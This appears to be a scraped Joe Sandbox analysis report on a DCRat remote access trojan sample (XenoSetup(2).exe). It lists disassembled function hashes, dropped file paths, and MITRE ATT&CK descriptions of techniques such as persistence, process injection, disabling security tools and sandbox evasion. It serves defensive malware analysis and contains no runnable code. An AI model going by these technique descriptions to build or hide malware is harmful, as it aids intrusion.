Instruction Fuzzy Hash: D4E092217197C44FC70E663888680207BB1EFAB21138952EBC046CB293ED1DDC89C741

Function 00007FFD348C6031 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d033ebdf30644773f4c7d914490ec30975dbcca13dcaba5ae4fb2407abd2803
Instruction ID: 74239543f1694a7cd76b594b72cda87448295142b002b8922f2abe558c9d950f
Opcode Fuzzy Hash: 7d033ebdf30644773f4c7d914490ec30975dbcca13dcaba5ae4fb2407abd2803
Instruction Fuzzy Hash: 61E017A180F7C12FDB5223B9086A498BFA0ED2321178911EFC186DB5A3D91E088B8312

Function 00007FFD348CF9F9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 650b25dd3e7f1b3995f1319a83fcdbcf125f31d76379af277aea2f14982e9651
Instruction ID: f3029918e09e9f55557274ef6f93b7efca9ec717d251591405a4633876c2b76c
Opcode Fuzzy Hash: 650b25dd3e7f1b3995f1319a83fcdbcf125f31d76379af277aea2f14982e9651
Instruction Fuzzy Hash: 64E04F2160ABC44FC74EA7388CA99603BB1DE6B25178A41D7C445CB6B3E91DC989C761

Function 00007FFD348D0989 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e610e4dd2e7717fd564a20d4f0a95a9c84ad07f2ba9861bde26cf586d298b5d
Instruction ID: 51cf1a56f1cbca786306b2f1e8cd69080e6de13db1d20b386e3b8548a8dfc8ed
Opcode Fuzzy Hash: 8e610e4dd2e7717fd564a20d4f0a95a9c84ad07f2ba9861bde26cf586d298b5d
Instruction Fuzzy Hash: BCE086216497844FC70DA7388CA95503BB1DF6B21178A40D7C005CB6B3E91ECC89C741

Function 00007FFD348D2A89 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16dfadd179ecf34dc362b637326c2ecae68af08f4febb480837a2f813528191
Instruction ID: 1e83b597434a39169e7261cfe3bde57fed3db7879b25b4eae69315092e018ba5
Opcode Fuzzy Hash: c16dfadd179ecf34dc362b637326c2ecae68af08f4febb480837a2f813528191
Instruction Fuzzy Hash: B8E04F2160A7C44FC70EA7388CA95543BB1DE6B21178A40DBC045CB6B3E91DC849C742

Function 00007FFD348D0B89 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880f8a00a4e7bb9a0baad4d47882ddd863ce1f857e2b8a1f98b096ef64de5c8e
Instruction ID: e6713c3c5298370f9cc73ad08a3edc74fc635cb21c55df7cfc06906c6543c1e1
Opcode Fuzzy Hash: 880f8a00a4e7bb9a0baad4d47882ddd863ce1f857e2b8a1f98b096ef64de5c8e
Instruction Fuzzy Hash: CDE04F2160ABC48FC70EA7288CA99543BB1EE6B21178A40DBC045CB6B3E91DC849C741

Function 00007FFD348D0ED8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178dc1c6c407775d8823a983d9702fddc80941125f10e27dcc427309c07f0786
Instruction ID: 9477d749ce81f3a5d891448a0327553014df1be68dc2301298d762628780ad36
Opcode Fuzzy Hash: 178dc1c6c407775d8823a983d9702fddc80941125f10e27dcc427309c07f0786
Instruction Fuzzy Hash: 49D05E30B11D0D4B8B4CA62D885C431B3D2E7AA2027D4537A940AC6291ED29ECC58780

Function 00007FFD348CA990 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1055befb614689331a2e886a2e3bacd9fcd75a83b0fd3c449d5ca9412fd069
Instruction ID: c03a4df5618e5dbb0c115455db15cfc2ac3a06d72f7ba33c38242ff2205473ff
Opcode Fuzzy Hash: ae1055befb614689331a2e886a2e3bacd9fcd75a83b0fd3c449d5ca9412fd069
Instruction Fuzzy Hash: 91D05E30B6194D4B8B0CA62D8458434B3D1E7AB20A7945278950BC2285ED29ECC68B81

Function 00007FFD348CAAD0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a67ec124f8106352afa2023ab0932a7c681e62123abd3eccf386591607365e2
Instruction ID: b0a973fa067815be1bf147dfac98c01b9b55d9954759871ebfd55dd3b986d5e2
Opcode Fuzzy Hash: 5a67ec124f8106352afa2023ab0932a7c681e62123abd3eccf386591607365e2
Instruction Fuzzy Hash: 53D05E30B11D0D4B8B0CA66D886C430B3D1EBAA2027945369D40AC2291ED29ECC58780

Function 00007FFD348D2620 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba268e19159a0af45079e1a73e4f9fde7b8e673a57ab2061270a37980d7c90b
Instruction ID: cd172edd17fe0fdc70ee19cd74c7e2931f0d8a693f1c28c7ae99f318ebb53012
Opcode Fuzzy Hash: 8ba268e19159a0af45079e1a73e4f9fde7b8e673a57ab2061270a37980d7c90b
Instruction Fuzzy Hash: 8BD05B30564A444B8B0CFA28C45543073E0F7AE206B50006DD54AC3181DA27DC46CB42

Function 00007FFD348C9A39 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e955e9f7a67d07faf0f2fcf1dd869e05b62b8e2d5747788cc638bd24a15109
Instruction ID: 1e9e8bc1c9585e344d29b67f5b9ff1179bfdb839cb6c98afe1fa51eab40e2801
Opcode Fuzzy Hash: 10e955e9f7a67d07faf0f2fcf1dd869e05b62b8e2d5747788cc638bd24a15109
Instruction Fuzzy Hash: D9E09A6154E3C04FCB0AAB7488699557F70AE6B21178E45DEC186CF5B3E62D8849C711

Function 00007FFD348C6B20 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD348B4B62 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348b0000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716dfadbb1a62042a9b0deefce0dcbc0f222f62f63ca06251f7454928c7194b7
Instruction ID: 6d670656656975d123e4f81fbcce0062b82055f9e175770560a146f9a9621097
Opcode Fuzzy Hash: 716dfadbb1a62042a9b0deefce0dcbc0f222f62f63ca06251f7454928c7194b7
Instruction Fuzzy Hash: F2E04F32B0C8064AE795A71088B2ABA3393EFD6711B140679C31AC31C5DEAC65079681

Function 00007FFD348CAA08 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de0fa8f0f332c8cea0b8cda8f93b0ed4ffba6ec7a0cde47bd06a0b87998bb8d
Instruction ID: d2739015c20e1218470fcabf8ebadba712e481734fb7a378de634df78b8101d1
Opcode Fuzzy Hash: 6de0fa8f0f332c8cea0b8cda8f93b0ed4ffba6ec7a0cde47bd06a0b87998bb8d
Instruction Fuzzy Hash: ACD0A930B258084F8B1CA72C88A882032D0EB6A20AB8400A8D00AC32A1E96AD888C740

Function 00007FFD348D09A0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD348D2AA0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD348B4EB3 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348b0000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc4f09aabf1aeb94ff0b3e180ae4d4d6ccc34fe0509f70319a0c89ecac46392
Instruction ID: 7282390000a01737636db10a65fc21d6cbef997df02f449bc9a95370ba482069
Opcode Fuzzy Hash: afc4f09aabf1aeb94ff0b3e180ae4d4d6ccc34fe0509f70319a0c89ecac46392
Instruction Fuzzy Hash: 5BD0C730B0890E8FE795FB1C9CA17A931A0EF45701F000071EA0DC3156CE7CD8116655

Function 00007FFD348B1BAD Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348b0000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3826b8aa85823cb8043e30c5f1a1a1bea30e0df88e779944c691c0ba05a15681
Instruction ID: 367bf018301c017ffd91ce371ad91969647ebd80c05fee03a606b81f958f2bdc
Opcode Fuzzy Hash: 3826b8aa85823cb8043e30c5f1a1a1bea30e0df88e779944c691c0ba05a15681
Instruction Fuzzy Hash: 7ED05E20B296074FE3A4EBA0C0F09B82290AF06300B58587AD11FD6587DCBC78409780

Function 00007FFD348C6050 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3107181110.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd348c3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41

Function 00007FFD350003CB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3144307203.00007FFD35000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD35000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd35000000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c9f1b42b66519728e8d3793e8d066ba13f0119d55f278057a56a3125bde40f
Instruction ID: d4133b531ba1793a65ab3fa389744fd61636c333487d170b881a62fac077e242
Opcode Fuzzy Hash: f1c9f1b42b66519728e8d3793e8d066ba13f0119d55f278057a56a3125bde40f
Instruction Fuzzy Hash: FFD0C910B1D69F86F67A970183B033E21986F05B01EA0033FC39F939C1CD2E75417202

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XenoSetup(2).exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DriverbrokerCrtDhcp.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NZdXlPbVdUubKXQ.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.0.cs

C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline

C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.out

C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat

C:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP

C:\Users\user\AppData\Local\Temp\MNP3j15Kfs

C:\Users\user\AppData\Local\Temp\RES4177.tmp

C:\Users\user\AppData\Local\Temp\RES436B.tmp

Windows Analysis Report
XenoSetup(2).exe.bin.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

